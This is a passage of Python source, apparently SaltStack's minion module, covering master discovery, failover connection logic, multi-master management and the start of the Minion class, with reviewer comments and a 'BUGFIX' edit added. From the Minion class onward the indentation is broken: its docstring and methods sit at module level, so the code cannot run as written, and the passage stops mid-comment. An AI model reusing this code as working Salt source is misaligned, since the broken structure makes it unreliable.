    if master is not None and type == 'alive':
        return '{0}_{1}'.format(tag, master)
    return tag
def service_name():
    '''
    Return the proper service name based on platform
    '''
    # BSD platforms name the service with an underscore instead of a dash.
    if 'bsd' in sys.platform:
        return 'salt_minion'
    return 'salt-minion'
class MinionBase(object):
    '''
    Shared base for minion objects: master discovery/resolution/connection,
    scheduler evaluation and beacon processing.
    '''
    def __init__(self, opts):
        # opts: the minion configuration dictionary
        self.opts = opts

    @staticmethod
    def process_schedule(minion, loop_interval):
        '''
        Evaluate the minion's scheduler and return the (possibly lowered)
        loop interval. Returns None when the minion has no scheduler
        attached.
        '''
        try:
            if hasattr(minion, 'schedule'):
                minion.schedule.eval()
            else:
                log.error('Minion scheduler not initialized. Scheduled jobs will not be run.')
                return
            # Check if scheduler requires lower loop interval than
            # the loop_interval setting
            if minion.schedule.loop_interval < loop_interval:
                loop_interval = minion.schedule.loop_interval
                log.debug(
                    'Overriding loop_interval because of scheduled jobs.'
                )
        except Exception as exc:
            log.error('Exception %s occurred in scheduled job', exc)
        return loop_interval

    def process_beacons(self, functions):
        '''
        Evaluate all of the configured beacons, grab the config again in case
        the pillar or grains changed

        Returns the list of fired beacon events, or [] when config.merge is
        unavailable or yields no beacon config.
        '''
        if 'config.merge' in functions:
            b_conf = functions['config.merge']('beacons', self.opts['beacons'], omit_opts=True)
            if b_conf:
                return self.beacons.process(b_conf, self.opts['grains'])  # pylint: disable=no-member
        return []

    @tornado.gen.coroutine
    def eval_master(self,
                    opts,
                    timeout=60,
                    safe=True,
                    failed=False,
                    failback=False):
        '''
        Evaluates and returns a tuple of the current master address and the pub_channel.

        In standard mode, just creates a pub_channel with the given master address.

        With master_type=func evaluates the current master address from the given
        module and then creates a pub_channel.

        With master_type=failover takes the list of masters and loops through them.
        The first one that allows the minion to create a pub_channel is then
        returned. If this function is called outside the minions initialization
        phase (for example from the minions main event-loop when a master connection
        loss was detected), 'failed' should be set to True. The current
        (possibly failed) master will then be removed from the list of masters.

        :param timeout: passed to the channel factory
        :param safe: passed to the channel factory
        :param failed: True when re-evaluating after a lost master connection
        :param failback: True when returning to the original master list
        '''
        # return early if we are not connecting to a master
        if opts['master_type'] == 'disable':
            log.warning('Master is set to disable, skipping connection')
            self.connected = False
            raise tornado.gen.Return((None, None))

        # Run masters discovery over SSDP. This may modify the whole configuration,
        # depending of the networking and sets of masters.
        # if we are using multimaster, discovery can only happen at start time
        # because MinionManager handles it. by eval_master time the minion doesn't
        # know about other siblings currently running
        if isinstance(self.opts['discovery'], dict) and not self.opts['discovery'].get('multimaster'):
            self._discover_masters()

        # check if master_type was altered from its default
        if opts['master_type'] != 'str' and opts['__role'] != 'syndic':
            # check for a valid keyword
            if opts['master_type'] == 'func':
                eval_master_func(opts)

            # if failover or distributed is set, master has to be of type list
            elif opts['master_type'] in ('failover', 'distributed'):
                if isinstance(opts['master'], list):
                    log.info(
                        'Got list of available master addresses: %s',
                        opts['master']
                    )

                    if opts['master_type'] == 'distributed':
                        master_len = len(opts['master'])
                        if master_len > 1:
                            # Pick a deterministic per-minion preferred master
                            # by hashing the minion id over the list length.
                            # NOTE(review): secondary_masters here is unused;
                            # looks like leftover code -- confirm.
                            secondary_masters = opts['master'][1:]
                            master_idx = crc32(opts['id']) % master_len
                            try:
                                preferred_masters = opts['master']
                                preferred_masters[0] = opts['master'][master_idx]
                                preferred_masters[1:] = [m for m in opts['master'] if m != preferred_masters[0]]
                                opts['master'] = preferred_masters
                                log.info('Distributed to the master at \'%s\'.', opts['master'][0])
                            except (KeyError, AttributeError, TypeError):
                                log.warning('Failed to distribute to a specific master.')
                        else:
                            log.warning('master_type = distributed needs more than 1 master.')

                    if opts['master_shuffle']:
                        log.warning(
                            'Use of \'master_shuffle\' detected. \'master_shuffle\' is deprecated in favor '
                            'of \'random_master\'. Please update your minion config file.'
                        )
                        opts['random_master'] = opts['master_shuffle']

                    # failover mode retries each master indefinitely within
                    # the connection loop, so disable the per-master limit
                    opts['auth_tries'] = 0
                    if opts['master_failback'] and opts['master_failback_interval'] == 0:
                        opts['master_failback_interval'] = opts['master_alive_interval']
                # if opts['master'] is a str and we have never created opts['master_list']
                elif isinstance(opts['master'], six.string_types) and ('master_list' not in opts):
                    # We have a string, but a list was what was intended. Convert.
                    # See issue 23611 for details
                    opts['master'] = [opts['master']]
                elif opts['__role'] == 'syndic':
                    log.info('Syndic setting master_syndic to \'%s\'', opts['master'])

                # if failed=True, the minion was previously connected
                # we're probably called from the minions main-event-loop
                # because a master connection loss was detected. remove
                # the possibly failed master from the list of masters.
                elif failed:
                    if failback:
                        # failback list of masters to original config
                        opts['master'] = opts['master_list']
                    else:
                        log.info(
                            'Moving possibly failed master %s to the end of '
                            'the list of masters', opts['master']
                        )
                        if opts['master'] in opts['local_masters']:
                            # create new list of master with the possibly failed
                            # one moved to the end
                            failed_master = opts['master']
                            opts['master'] = [x for x in opts['local_masters'] if opts['master'] != x]
                            opts['master'].append(failed_master)
                        else:
                            opts['master'] = opts['master_list']
                else:
                    msg = ('master_type set to \'failover\' but \'master\' '
                           'is not of type list but of type '
                           '{0}'.format(type(opts['master'])))
                    log.error(msg)
                    sys.exit(salt.defaults.exitcodes.EX_GENERIC)

                # If failover is set, minion have to failover on DNS errors instead of retry DNS resolve.
                # See issue 21082 for details
                if opts['retry_dns'] and opts['master_type'] == 'failover':
                    msg = ('\'master_type\' set to \'failover\' but \'retry_dns\' is not 0. '
                           'Setting \'retry_dns\' to 0 to failover to the next master on DNS errors.')
                    log.critical(msg)
                    opts['retry_dns'] = 0

            else:
                msg = ('Invalid keyword \'{0}\' for variable '
                       '\'master_type\''.format(opts['master_type']))
                log.error(msg)
                sys.exit(salt.defaults.exitcodes.EX_GENERIC)

        # FIXME: if SMinion don't define io_loop, it can't switch master see #29088
        # Specify kwargs for the channel factory so that SMinion doesn't need to define an io_loop
        # (The channel factories will set a default if the kwarg isn't passed)
        factory_kwargs = {'timeout': timeout, 'safe': safe}
        if getattr(self, 'io_loop', None):
            factory_kwargs['io_loop'] = self.io_loop  # pylint: disable=no-member

        tries = opts.get('master_tries', 1)
        attempts = 0

        # This sits outside of the connection loop below because it needs to set
        # up a list of master URIs regardless of which masters are available
        # to connect _to_. This is primarily used for masterless mode, when
        # we need a list of master URIs to fire calls back to.
        opts['master_uri_list'] = []
        if 'master_list' not in opts:
            if isinstance(opts['master'], list):
                opts['master_list'] = copy.copy(opts['master'])
            else:
                opts['master_list'] = [opts['master']]

        for master in opts['master_list']:
            opts['master'] = master
            opts.update(prep_ip_port(opts))
            opts['master_uri_list'].append(resolve_dns(opts)['master_uri'])

        # if we have a list of masters, loop through them and be
        # happy with the first one that allows us to connect
        # NOTE(review): the loop above reassigned opts['master'] to the last
        # master_list entry (a single master), so this isinstance check may
        # never see a list here -- confirm this is the intended behavior.
        if isinstance(opts['master'], list):
            conn = False
            last_exc = None
            opts['local_masters'] = copy.copy(opts['master'])

            # shuffle the masters and then loop through them
            if opts['random_master']:
                # master_failback is only used when master_type is set to failover
                if opts['master_type'] == 'failover' and opts['master_failback']:
                    # keep the primary first; randomize only the fallbacks
                    secondary_masters = opts['local_masters'][1:]
                    shuffle(secondary_masters)
                    opts['local_masters'][1:] = secondary_masters
                else:
                    shuffle(opts['local_masters'])

            while True:
                if attempts != 0:
                    # Give up a little time between connection attempts
                    # to allow the IOLoop to run any other scheduled tasks.
                    yield tornado.gen.sleep(opts['acceptance_wait_time'])
                attempts += 1
                if tries > 0:
                    log.debug(
                        'Connecting to master. Attempt %s of %s',
                        attempts, tries
                    )
                else:
                    log.debug(
                        'Connecting to master. Attempt %s (infinite attempts)',
                        attempts
                    )
                for master in opts['local_masters']:
                    opts['master'] = master
                    opts.update(prep_ip_port(opts))
                    opts.update(resolve_dns(opts))

                    # on first run, update self.opts with the whole master list
                    # to enable a minion to re-use old masters if they get fixed
                    if 'master_list' not in opts:
                        opts['master_list'] = copy.copy(opts['local_masters'])
                    self.opts = opts

                    pub_channel = salt.transport.client.AsyncPubChannel.factory(opts, **factory_kwargs)
                    try:
                        yield pub_channel.connect()
                        conn = True
                        break
                    except SaltClientError as exc:
                        last_exc = exc
                        # NOTE(review): msg is a tuple here, and log.info(msg)
                        # logs the tuple's repr rather than interpolating the
                        # placeholders -- confirm whether log.info(*msg) was
                        # intended.
                        if exc.strerror.startswith('Could not access'):
                            msg = (
                                'Failed to initiate connection with Master '
                                '%s: check ownership/permissions. Error '
                                'message: %s', opts['master'], exc
                            )
                        else:
                            msg = ('Master %s could not be reached, trying next '
                                   'next master (if any)', opts['master'])
                        log.info(msg)
                        continue

                if not conn:
                    if attempts == tries:
                        # Exhausted all attempts. Return exception.
                        self.connected = False
                        self.opts['master'] = copy.copy(self.opts['local_masters'])
                        log.error(
                            'No master could be reached or all masters '
                            'denied the minion\'s connection attempt.'
                        )
                        # If the code reaches this point, 'last_exc'
                        # should already be set.
                        raise last_exc  # pylint: disable=E0702
                else:
                    self.tok = pub_channel.auth.gen_token(b'salt')
                    self.connected = True
                    raise tornado.gen.Return((opts['master'], pub_channel))

        # single master sign in
        else:
            if opts['random_master']:
                log.warning('random_master is True but there is only one master specified. Ignoring.')
            while True:
                if attempts != 0:
                    # Give up a little time between connection attempts
                    # to allow the IOLoop to run any other scheduled tasks.
                    yield tornado.gen.sleep(opts['acceptance_wait_time'])
                attempts += 1
                if tries > 0:
                    log.debug(
                        'Connecting to master. Attempt %s of %s',
                        attempts, tries
                    )
                else:
                    log.debug(
                        'Connecting to master. Attempt %s (infinite attempts)',
                        attempts
                    )
                opts.update(prep_ip_port(opts))
                opts.update(resolve_dns(opts))
                try:
                    if self.opts['transport'] == 'detect':
                        # Probe the transports in order and keep the first one
                        # that authenticates.
                        self.opts['detect_mode'] = True
                        for trans in ('zeromq', 'tcp'):
                            if trans == 'zeromq' and not zmq:
                                continue
                            self.opts['transport'] = trans
                            pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
                            yield pub_channel.connect()
                            if not pub_channel.auth.authenticated:
                                continue
                            del self.opts['detect_mode']
                            break
                    else:
                        pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
                        yield pub_channel.connect()
                    self.tok = pub_channel.auth.gen_token(b'salt')
                    self.connected = True
                    raise tornado.gen.Return((opts['master'], pub_channel))
                except SaltClientError as exc:
                    if attempts == tries:
                        # Exhausted all attempts. Return exception.
                        self.connected = False
                        raise exc

    def _discover_masters(self):
        '''
        Discover master(s) and decide where to connect, if SSDP is around.
        This modifies the configuration on the fly.
        :return:
        '''
        # Only runs when the configured master is still the default, i.e.
        # the user did not pin one explicitly.
        if self.opts['master'] == DEFAULT_MINION_OPTS['master'] and self.opts['discovery'] is not False:
            master_discovery_client = salt.utils.ssdp.SSDPDiscoveryClient()
            masters = {}
            for att in range(self.opts['discovery'].get('attempts', 3)):
                try:
                    att += 1
                    log.info('Attempting %s time(s) to discover masters', att)
                    masters.update(master_discovery_client.discover())
                    if not masters:
                        time.sleep(self.opts['discovery'].get('pause', 5))
                    else:
                        break
                except Exception as err:
                    log.error('SSDP discovery failure: %s', err)
                    break

            if masters:
                policy = self.opts.get('discovery', {}).get('match', 'any')
                if policy not in ['any', 'all']:
                    log.error('SSDP configuration matcher failure: unknown value "%s". '
                              'Should be "any" or "all"', policy)
                    return
                mapping = self.opts['discovery'].get('mapping', {})
                discovered = []
                for addr, mappings in masters.items():
                    for proto_data in mappings:
                        # count how many configured mapping entries the
                        # advertised master matches
                        cnt = len([key for key, value in mapping.items()
                                   if proto_data.get('mapping', {}).get(key) == value])
                        if policy == 'any' and bool(cnt) or cnt == len(mapping):
                            if self.opts['discovery'].get('multimaster'):
                                discovered.append(proto_data['master'])
                            else:
                                # single-master: take the first match and stop
                                self.opts['master'] = proto_data['master']
                                return
                self.opts['master'] = discovered

    def _return_retry_timer(self):
        '''
        Based on the minion configuration, either return a randomized timer or
        just return the value of the return_retry_timer.
        '''
        msg = 'Minion return retry timer set to %s seconds'
        if self.opts.get('return_retry_timer_max'):
            try:
                random_retry = randint(self.opts['return_retry_timer'], self.opts['return_retry_timer_max'])
                # NOTE(review): retry_msg is never used -- looks like leftover
                # code; the log.debug below formats the message itself.
                retry_msg = msg % random_retry
                log.debug('%s (randomized)', msg % random_retry)
                return random_retry
            except ValueError:
                # Catch wiseguys using negative integers here
                log.error(
                    'Invalid value (return_retry_timer: %s or '
                    'return_retry_timer_max: %s). Both must be positive '
                    'integers.',
                    self.opts['return_retry_timer'],
                    self.opts['return_retry_timer_max'],
                )
                log.debug(msg, DEFAULT_MINION_OPTS['return_retry_timer'])
                return DEFAULT_MINION_OPTS['return_retry_timer']
        else:
            log.debug(msg, self.opts.get('return_retry_timer'))
            return self.opts.get('return_retry_timer')
class SMinion(MinionBase):
    '''
    Create an object that has loaded all of the minion module functions,
    grains, modules, returners etc.  The SMinion allows developers to
    generate all of the salt minion functions and present them with these
    functions for general use.
    '''
    def __init__(self, opts):
        # Late setup of the opts grains, so we can log from the grains module
        import salt.loader
        opts['grains'] = salt.loader.grains(opts)
        super(SMinion, self).__init__(opts)

        # run ssdp discovery if necessary
        self._discover_masters()

        # Clean out the proc directory (default /var/cache/salt/minion/proc)
        if (self.opts.get('file_client', 'remote') == 'remote'
                or self.opts.get('use_master_when_local', False)):
            install_zmq()
            io_loop = ZMQDefaultLoop.current()
            # resolve the master and connect synchronously before loading
            # modules that may need it
            io_loop.run_sync(
                lambda: self.eval_master(self.opts, failed=True)
            )
        self.gen_modules(initial_load=True)

        # If configured, cache pillar data on the minion
        if self.opts['file_client'] == 'remote' and self.opts.get('minion_pillar_cache', False):
            import salt.utils.yaml
            pdir = os.path.join(self.opts['cachedir'], 'pillar')
            if not os.path.isdir(pdir):
                # pillar data can be sensitive; restrict the dir to the owner
                os.makedirs(pdir, 0o700)
            ptop = os.path.join(pdir, 'top.sls')
            if self.opts['saltenv'] is not None:
                penv = self.opts['saltenv']
            else:
                penv = 'base'
            cache_top = {penv: {self.opts['id']: ['cache']}}
            with salt.utils.files.fopen(ptop, 'wb') as fp_:
                salt.utils.yaml.safe_dump(cache_top, fp_)
                os.chmod(ptop, 0o600)
            cache_sls = os.path.join(pdir, 'cache.sls')
            with salt.utils.files.fopen(cache_sls, 'wb') as fp_:
                salt.utils.yaml.safe_dump(self.opts['pillar'], fp_)
                os.chmod(cache_sls, 0o600)

    def gen_modules(self, initial_load=False):
        '''
        Tell the minion to reload the execution modules

        CLI Example:

        .. code-block:: bash

            salt '*' sys.reload_modules
        '''
        # compile pillar first so the loaders below see up-to-date data
        self.opts['pillar'] = salt.pillar.get_pillar(
            self.opts,
            self.opts['grains'],
            self.opts['id'],
            self.opts['saltenv'],
            pillarenv=self.opts.get('pillarenv'),
        ).compile_pillar()

        self.utils = salt.loader.utils(self.opts)
        self.functions = salt.loader.minion_mods(self.opts, utils=self.utils)
        self.serializers = salt.loader.serializers(self.opts)
        self.returners = salt.loader.returners(self.opts, self.functions)
        self.proxy = salt.loader.proxy(self.opts, self.functions, self.returners, None)
        # TODO: remove
        self.function_errors = {}  # Keep the funcs clean
        self.states = salt.loader.states(self.opts,
                                         self.functions,
                                         self.utils,
                                         self.serializers)
        self.rend = salt.loader.render(self.opts, self.functions)
        # self.matcher = Matcher(self.opts, self.functions)
        self.matchers = salt.loader.matchers(self.opts)
        # expose module reloading to callers via the function registry
        self.functions['sys.reload_modules'] = self.gen_modules
        self.executors = salt.loader.executors(self.opts)
class MasterMinion(object):
    '''
    Create a fully loaded minion function object for generic use on the
    master. What makes this class different is that the pillar is
    omitted, otherwise everything else is loaded cleanly.
    '''
    def __init__(
            self,
            opts,
            returners=True,
            states=True,
            rend=True,
            matcher=True,
            whitelist=None,
            ignore_config_errors=True):
        # Re-read the minion config from the master's conf_file, then let
        # the caller-supplied opts override the file values.
        self.opts = salt.config.minion_config(
            opts['conf_file'],
            ignore_config_errors=ignore_config_errors,
            role='master'
        )
        self.opts.update(opts)
        self.whitelist = whitelist
        # NOTE(review): grains are generated from the raw caller 'opts',
        # not the merged self.opts -- confirm this is intentional.
        self.opts['grains'] = salt.loader.grains(opts)
        # Pillar is deliberately left empty for master-side use
        self.opts['pillar'] = {}
        # mk_* flags record which loader subsystems gen_modules should build
        self.mk_returners = returners
        self.mk_states = states
        self.mk_rend = rend
        self.mk_matcher = matcher
        self.gen_modules(initial_load=True)

    def gen_modules(self, initial_load=False):
        '''
        Tell the minion to reload the execution modules

        CLI Example:

        .. code-block:: bash

            salt '*' sys.reload_modules
        '''
        self.utils = salt.loader.utils(self.opts)
        self.functions = salt.loader.minion_mods(
            self.opts,
            utils=self.utils,
            whitelist=self.whitelist,
            initial_load=initial_load)
        self.serializers = salt.loader.serializers(self.opts)
        if self.mk_returners:
            self.returners = salt.loader.returners(self.opts, self.functions)
        if self.mk_states:
            self.states = salt.loader.states(self.opts,
                                             self.functions,
                                             self.utils,
                                             self.serializers)
        if self.mk_rend:
            self.rend = salt.loader.render(self.opts, self.functions)
        if self.mk_matcher:
            self.matchers = salt.loader.matchers(self.opts)
        # Expose reload through the function dict so modules can trigger it
        self.functions['sys.reload_modules'] = self.gen_modules
class MinionManager(MinionBase):
    '''
    Create a multi minion interface, this creates as many minions as are
    defined in the master option and binds each minion object to a respective
    master.
    '''
    def __init__(self, opts):
        super(MinionManager, self).__init__(opts)
        # Back-off parameters (seconds) for repeated auth attempts
        self.auth_wait = self.opts['acceptance_wait_time']
        self.max_auth_wait = self.opts['acceptance_wait_time_max']
        self.minions = []
        # Shared JID queue so duplicate jobs from multiple masters are
        # suppressed across all managed minions
        self.jid_queue = []
        install_zmq()
        self.io_loop = ZMQDefaultLoop.current()
        self.process_manager = ProcessManager(name='MultiMinionProcessManager')
        self.io_loop.spawn_callback(self.process_manager.run, **{'asynchronous': True})  # Tornado backward compat

    def __del__(self):
        self.destroy()

    def _bind(self):
        # start up the event publisher, so we can see events during startup
        self.event_publisher = salt.utils.event.AsyncEventPublisher(
            self.opts,
            io_loop=self.io_loop,
        )
        self.event = salt.utils.event.get_event('minion', opts=self.opts, io_loop=self.io_loop)
        # Subscribe to every tag; handle_event fans events out to minions
        self.event.subscribe('')
        self.event.set_event_handler(self.handle_event)

    @tornado.gen.coroutine
    def handle_event(self, package):
        # Yielding the list runs all per-minion handlers concurrently and
        # waits until every one has completed.
        yield [minion.handle_event(package) for minion in self.minions]

    def _create_minion_object(self, opts, timeout, safe,
                              io_loop=None, loaded_base_name=None,
                              jid_queue=None):
        '''
        Helper function to return the correct type of object
        '''
        return Minion(opts,
                      timeout,
                      safe,
                      io_loop=io_loop,
                      loaded_base_name=loaded_base_name,
                      jid_queue=jid_queue)

    def _check_minions(self):
        '''
        Check the size of self.minions and raise an error if it's empty
        '''
        # NOTE(review): despite the docstring, nothing is raised here --
        # the failure is only logged.
        if not self.minions:
            err = ('Minion unable to successfully connect to '
                   'a Salt Master.')
            log.error(err)

    def _spawn_minions(self, timeout=60):
        '''
        Spawn all the coroutines which will sign in to masters
        '''
        # Run masters discovery over SSDP. This may modify the whole configuration,
        # depending of the networking and sets of masters. If match is 'any' we let
        # eval_master handle the discovery instead so disconnections can also handle
        # discovery
        if isinstance(self.opts['discovery'], dict) and self.opts['discovery'].get('multimaster'):
            self._discover_masters()

        masters = self.opts['master']
        if (self.opts['master_type'] in ('failover', 'distributed')) or not isinstance(self.opts['master'], list):
            # Failover/distributed modes use one minion for the whole set,
            # so wrap the single entry for uniform iteration below.
            masters = [masters]
        self.opts['master_list'] = copy.deepcopy(masters)

        for master in masters:
            # Each minion gets its own deep copy of opts bound to one master
            s_opts = copy.deepcopy(self.opts)
            s_opts['master'] = master
            s_opts['multimaster'] = True
            minion = self._create_minion_object(s_opts,
                                                s_opts['auth_timeout'],
                                                False,
                                                io_loop=self.io_loop,
                                                loaded_base_name='salt.loader.{0}'.format(s_opts['master']),
                                                jid_queue=self.jid_queue)
            self.io_loop.spawn_callback(self._connect_minion, minion)
        # After the grace period, log an error if no master accepted us
        self.io_loop.call_later(timeout, self._check_minions)

    @tornado.gen.coroutine
    def _connect_minion(self, minion):
        '''
        Create a minion, and asynchronously connect it to a master
        '''
        auth_wait = minion.opts['acceptance_wait_time']
        failed = False
        while True:
            if failed:
                # Linear back-off between attempts, capped at max_auth_wait
                if auth_wait < self.max_auth_wait:
                    auth_wait += self.auth_wait
                log.debug(
                    "sleeping before reconnect attempt to %s [%d/%d]",
                    minion.opts['master'],
                    auth_wait,
                    self.max_auth_wait,
                )
                yield tornado.gen.sleep(auth_wait)  # TODO: log?
            try:
                if minion.opts.get('beacons_before_connect', False):
                    minion.setup_beacons(before_connect=True)
                if minion.opts.get('scheduler_before_connect', False):
                    minion.setup_scheduler(before_connect=True)
                yield minion.connect_master(failed=failed)
                minion.tune_in(start=False)
                self.minions.append(minion)
                break
            except SaltClientError as exc:
                # Transient failure: retry with back-off
                failed = True
                log.error(
                    'Error while bringing up minion for multi-master. Is '
                    'master at %s responding?', minion.opts['master']
                )
            except SaltMasterUnresolvableError:
                # Permanent failure: bad address, give up on this master
                err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. ' \
                      'Set \'master\' value in minion config.'.format(minion.opts['master'])
                log.error(err)
                break
            except Exception as e:
                # Unknown failure: log with traceback and keep retrying
                failed = True
                log.critical(
                    'Unexpected error while connecting to %s',
                    minion.opts['master'], exc_info=True
                )

    # Multi Master Tune In
    def tune_in(self):
        '''
        Bind to the masters

        This loop will attempt to create connections to masters it hasn't connected
        to yet, but once the initial connection is made it is up to ZMQ to do the
        reconnect (don't know of an API to get the state here in salt)
        '''
        self._bind()

        # Fire off all the minion coroutines
        self._spawn_minions()

        # serve forever!
        self.io_loop.start()

    @property
    def restart(self):
        # True if any managed minion has requested a restart
        for minion in self.minions:
            if minion.restart:
                return True
        return False

    def stop(self, signum):
        # Forward the signal to every minion's process manager and tear down
        for minion in self.minions:
            minion.process_manager.stop_restarting()
            minion.process_manager.send_signal_to_processes(signum)
            # kill any remaining processes
            minion.process_manager.kill_children()
            minion.destroy()

    def destroy(self):
        for minion in self.minions:
            minion.destroy()
class Minion(MinionBase):
'''
This class instantiates a minion, runs connections for a minion,
and loads all of the functions into the minion
'''
def __init__(self, opts, timeout=60, safe=True, loaded_base_name=None, io_loop=None, jid_queue=None):  # pylint: disable=W0231
    '''
    Pass in the options dict

    :param opts: minion configuration dict; mutated here (grains are
        generated, some feature flags may be force-disabled for proxies).
    :param timeout: auth timeout forwarded to eval_master when connecting.
    :param safe: forwarded to eval_master.
    :param loaded_base_name: alternate loader namespace (used by
        MinionManager to isolate per-master module loads).
    :param jid_queue: optionally shared list of recently-seen JIDs used to
        suppress duplicate jobs.
    '''
    # this means that the parent class doesn't know *which* master we connect to
    super(Minion, self).__init__(opts)
    self.timeout = timeout
    self.safe = safe
    self._running = None
    self.win_proc = []  # Windows-only: spawned job processes kept for later
    self.loaded_base_name = loaded_base_name
    self.connected = False
    self.restart = False
    # Flag meaning minion has finished initialization including first connect to the master.
    # True means the Minion is fully functional and ready to handle events.
    self.ready = False
    self.jid_queue = [] if jid_queue is None else jid_queue
    self.periodic_callbacks = {}

    if io_loop is None:
        install_zmq()
        self.io_loop = ZMQDefaultLoop.current()
    else:
        self.io_loop = io_loop

    # Warn if ZMQ < 3.2
    if zmq:
        if ZMQ_VERSION_INFO < (3, 2):
            log.warning(
                'You have a version of ZMQ less than ZMQ 3.2! There are '
                'known connection keep-alive issues with ZMQ < 3.2 which '
                'may result in loss of contact with minions. Please '
                'upgrade your ZMQ!'
            )
    # Late setup of the opts grains, so we can log from the grains
    # module. If this is a proxy, however, we need to init the proxymodule
    # before we can get the grains. We do this for proxies in the
    # post_master_init
    if not salt.utils.platform.is_proxy():
        self.opts['grains'] = salt.loader.grains(opts)
    else:
        # Proxies cannot run beacons/scheduler before the proxy module is
        # initialized, so force-disable those pre-connect options here.
        if self.opts.get('beacons_before_connect', False):
            log.warning(
                '\'beacons_before_connect\' is not supported '
                'for proxy minions. Setting to False'
            )
            self.opts['beacons_before_connect'] = False
        if self.opts.get('scheduler_before_connect', False):
            log.warning(
                '\'scheduler_before_connect\' is not supported '
                'for proxy minions. Setting to False'
            )
            self.opts['scheduler_before_connect'] = False

    log.info('Creating minion process manager')

    if self.opts['random_startup_delay']:
        # Spread simultaneous minion starts (e.g. after a fleet reboot)
        sleep_time = random.randint(0, self.opts['random_startup_delay'])
        log.info(
            'Minion sleeping for %s seconds due to configured '
            'startup_delay between 0 and %s seconds',
            sleep_time, self.opts['random_startup_delay']
        )
        time.sleep(sleep_time)

    self.process_manager = ProcessManager(name='MinionProcessManager')
    self.io_loop.spawn_callback(self.process_manager.run, **{'asynchronous': True})
    # We don't have the proxy setup yet, so we can't start engines
    # Engines need to be able to access __proxy__
    if not salt.utils.platform.is_proxy():
        self.io_loop.spawn_callback(salt.engines.start_engines, self.opts,
                                    self.process_manager)

    # Install the SIGINT/SIGTERM handlers if not done so far
    if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
        # No custom signal handling was added, install our own
        signal.signal(signal.SIGINT, self._handle_signals)

    if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
        # No custom signal handling was added, install our own
        signal.signal(signal.SIGTERM, self._handle_signals)
def _handle_signals(self, signum, sigframe):  # pylint: disable=unused-argument
    # SIGINT/SIGTERM handler: stop the run loop flag, tear down child
    # processes, then exit the process with status 0.
    self._running = False
    # escalate the signals to the process manager
    self.process_manager.stop_restarting()
    self.process_manager.send_signal_to_processes(signum)
    # kill any remaining processes
    self.process_manager.kill_children()
    # Give children a moment to terminate before we exit ourselves
    time.sleep(1)
    sys.exit(0)
def sync_connect_master(self, timeout=None, failed=False):
    '''
    Block until we are connected to a master

    Drives the asynchronous connect_master() to completion on the IO loop.

    :param timeout: optional seconds after which to stop waiting and raise
        SaltDaemonNotRunning.
    :param failed: True when reconnecting after a previous failure;
        forwarded to connect_master().
    :raises SaltDaemonNotRunning: when the timeout elapses without success.
    '''
    self._sync_connect_master_success = False
    log.debug("sync_connect_master")

    def on_connect_master_future_done(future):
        # Runs when the connect future resolves (success OR failure);
        # any failure is surfaced via future.exception() below.
        self._sync_connect_master_success = True
        self.io_loop.stop()

    self._connect_master_future = self.connect_master(failed=failed)
    # finish connecting to master
    self._connect_master_future.add_done_callback(on_connect_master_future_done)
    if timeout:
        self.io_loop.call_later(timeout, self.io_loop.stop)
    try:
        self.io_loop.start()
    except KeyboardInterrupt:
        self.destroy()
    # Re-raise any connection error to preserve restart_on_error behavior.
    # Please read PR #23978 before changing, hopefully avoiding regressions.
    if self._connect_master_future.done():
        future_exception = self._connect_master_future.exception()
        if future_exception:
            # BUGFIX: this used to be `raise six.reraise(*future_exception)`,
            # but Future.exception() returns the exception *instance*, not an
            # (exc_type, value, traceback) triple -- star-unpacking it raised
            # a TypeError that masked the real connection error.  Re-raise
            # the instance directly instead.
            raise future_exception
    if timeout and self._sync_connect_master_success is False:
        raise SaltDaemonNotRunning('Failed to connect to the salt-master')
@tornado.gen.coroutine
def connect_master(self, failed=False):
    '''
    Return a future which will complete when you are connected to a master

    :param failed: True when this is a reconnect after a failed attempt;
        forwarded to eval_master so it can rotate/fail over masters.
    '''
    # eval_master resolves which master to use and opens the pub channel
    master, self.pub_channel = yield self.eval_master(self.opts, self.timeout, self.safe, failed)
    yield self._post_master_init(master)
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
    '''
    Function to finish init after connecting to a master

    This is primarily loading modules, pillars, etc. (since they need
    to know which master they connected to)

    If this function is changed, please check ProxyMinion._post_master_init
    to see if those changes need to be propagated.

    Minions and ProxyMinions need significantly different post master setups,
    which is why the differences are not factored out into separate helper
    functions.

    :param master: the master this minion just connected to.
    '''
    if self.connected:
        self.opts['master'] = master

        # Initialize pillar before loader to make pillar accessible in modules
        async_pillar = salt.pillar.get_async_pillar(
            self.opts,
            self.opts['grains'],
            self.opts['id'],
            self.opts['saltenv'],
            pillarenv=self.opts.get('pillarenv')
        )
        self.opts['pillar'] = yield async_pillar.compile_pillar()
        async_pillar.destroy()

    if not self.ready:
        # First successful connect: finish building the minion (modules,
        # schedule, beacons, ...).
        self._setup_core()
    elif self.connected and self.opts['pillar']:
        # The pillar has changed due to the connection to the master.
        # Reload the functions so that they can use the new pillar data.
        self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
        if hasattr(self, 'schedule'):
            self.schedule.functions = self.functions
            self.schedule.returners = self.returners

    if not hasattr(self, 'schedule'):
        self.schedule = salt.utils.schedule.Schedule(
            self.opts,
            self.functions,
            self.returners,
            cleanup=[master_event(type='alive')])

    # add default scheduling jobs to the minions scheduler
    if self.opts['mine_enabled'] and 'mine.update' in self.functions:
        self.schedule.add_job({
            '__mine_interval':
            {
                'function': 'mine.update',
                'minutes': self.opts['mine_interval'],
                'jid_include': True,
                'maxrunning': 2,
                'run_on_start': True,
                'return_job': self.opts.get('mine_return_job', False)
            }
        }, persist=True)
        log.info('Added mine.update to scheduler')
    else:
        self.schedule.delete_job('__mine_interval', persist=True)

    # add master_alive job if enabled
    # (skipped on the tcp transport, which tracks connection state itself)
    if (self.opts['transport'] != 'tcp' and
            self.opts['master_alive_interval'] > 0 and
            self.connected):
        self.schedule.add_job({
            master_event(type='alive', master=self.opts['master']):
            {
                'function': 'status.master',
                'seconds': self.opts['master_alive_interval'],
                'jid_include': True,
                'maxrunning': 1,
                'return_job': False,
                'kwargs': {'master': self.opts['master'],
                           'connected': True}
            }
        }, persist=True)
        if self.opts['master_failback'] and \
                'master_list' in self.opts and \
                self.opts['master'] != self.opts['master_list'][0]:
            # Not connected to the preferred (first) master: periodically
